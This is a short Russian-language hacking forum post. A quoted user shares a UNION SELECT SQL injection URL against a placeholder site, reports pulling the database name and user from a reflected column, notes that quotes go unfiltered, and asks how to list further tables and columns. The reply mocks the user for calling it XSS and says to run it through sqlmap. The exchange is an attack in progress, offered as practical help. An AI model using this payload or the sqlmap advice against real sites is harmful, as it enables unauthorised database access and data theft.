07.04.2017, 07:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
6426
Репутация:
0
|
|
Сообщение от pastword
pastword said:
↑
Есть XSS:
site.dn/topic.php?SECTION_ID=22%27+uNiOn+SeLecT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+;&ID=35&UPPER_ID=
колонка №9 выводится на стр. с помощью чего получил ответы на database() и user(). Как узнать имена других таблиц и колонок?
Кавычки не фильтруются.
без Blind никак? загоняй свою "XSS, которая на самом деле не XSS" в sqlmap и восславляй Ктулху
|
|
|
|